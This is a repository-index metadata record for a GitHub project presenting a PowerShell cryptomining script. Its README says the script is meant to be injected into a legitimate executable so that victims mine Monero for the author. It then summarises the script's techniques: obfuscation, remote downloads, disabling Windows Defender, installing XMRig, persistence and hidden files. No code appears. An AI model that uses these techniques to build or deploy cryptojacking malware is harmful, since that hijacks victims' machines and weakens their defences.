{"id":21233698,"url":"https://github.com/bdr-pro/silent-penguin-malware-script","last_synced_at":"2025-03-15T02:44:00.298Z","repository":{"id":172017739,"uuid":"636899596","full_name":"BDR-Pro/Silent-Penguin-malware-script","owner":"BDR-Pro","description":"mining script can be injected to ligit exe to make the victim mine monero for you","archived":false,"fork":false,"pushed_at":"2024-02-12T19:31:00.000Z","size":15679,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-01-21T18:38:50.926Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/BDR-Pro.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-05-05T23:30:23.000Z","updated_at":"2024-01-28T09:51:31.000Z","dependencies_parsed_at":"2024-02-12T20:50:44.214Z","dependency_job_id":null,"html_url":"https://github.com/BDR-Pro/Silent-Penguin-malware-script","commit_stats":null,"previous_names":["bdr-pro/my-first-mining-malware-script"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BDR-Pro%2FSilent-Penguin-malware-script","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BDR-Pro%2FSilent-Penguin-malware-script/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BDR-Pro%2FSilent-Penguin-malware-script/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BDR-Pro%2FSilent-Penguin-malware-script/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/BDR-Pro","download_url":"https://codeload.github.com/BDR-Pro/Silent-Penguin-malware-script/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243676707,"owners_count":20329432,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-21T00:00:04.348Z","updated_at":"2025-03-15T02:44:00.279Z","avatar_url":"https://github.com/BDR-Pro.png","language":"PowerShell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# My mining virus\n```diff\n+ This is part of my malware devolping projects please make sure you follow any updates\n```\n\n![image](https://github.com/BDR-Pro/My-first-mining-malware-script/assets/91114465/ec89a426-1ae7-4535-8e32-b6e1468dd7c5)\n\n![image](https://github.com/BDR-Pro/Silent-Penguin-malware-script/assets/91114465/6b4aca66-c217-4e6c-b95b-53b718bd9224)\n[REPORT](https://www.virustotal.com/gui/file/5215d83ffe963bae62ff36e990c9cb1e3194ec7f1d189284077a16de6a42a62d/detection)\n\nmining script can be injected to ligit exe to make the victim mine monero for yo\nembeded to make with download the start and the word , runing the word directly \nstart to make sure the mining task is persistance \n\n\n\n\n\nThe provided text appears to be a PowerShell script with malicious intent, designed to conduct unauthorized activities on a targeted machine, typically associated with cyber threats such as malware or a crypto miner. Here's a breakdown of its key components and functionalities:\n\n1. **Aliases and Variable Initializations**: The script starts by setting aliases for common PowerShell cmdlets, presumably to obfuscate its actions from casual observation or automated analysis tools.\n\n2. **Remote File Downloads**: It constructs URLs from concatenated strings to download files from remote locations. This technique is often used to bypass simple string matching detection mechanisms.\n\n3. **Execution of Downloaded Files**: After downloading, it executes the files, which is a common behavior in malware to run payloads retrieved from remote servers.\n\n4. **Sleep Commands**: The script uses sleep commands to delay operations, possibly to evade time-based detection mechanisms.\n\n5. **Obfuscation Techniques**: It employs character code arrays and string joins to hide the actual commands being executed, making analysis and detection more challenging.\n\n6. **Disabling Security Features**: Commands such as disabling real-time monitoring and sample submission settings of Windows Defender indicate an attempt to weaken the host's defenses.\n\n7. **Cryptocurrency Miner Installation**: The script downloads and installs XMRig, a legitimate tool often misused by attackers for unauthorized cryptocurrency mining on compromised machines.\n\n8. **Persistence Mechanisms**: It makes modifications to system settings and places files in specific locations to ensure the miner runs continuously, including setting up the miner to start with Windows.\n\n9. **Concealment**: The script sets files and directories to hidden, aiming to avoid detection by the user or simple file system scans.\n\n10. **Execution with Elevated Privileges**: It attempts to run processes with elevated privileges, which is necessary for certain operations like modifying system settings or installing software without user prompts.\n\n11. **Obfuscated Final Note**: The script ends with an encoded message, which, when decoded, seems to serve as a form of signature or a message from the author, indicating success in malware analysis if found.\n\nThis script is a serious security threat and should not be executed on any machine. If you've encountered this script during a security analysis or as part of an incident response, it's crucial to isolate the affected system, conduct a thorough investigation to understand the full scope of the compromise, and apply necessary remediation steps.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbdr-pro%2Fsilent-penguin-malware-script","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbdr-pro%2Fsilent-penguin-malware-script","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbdr-pro%2Fsilent-penguin-malware-script/lists"}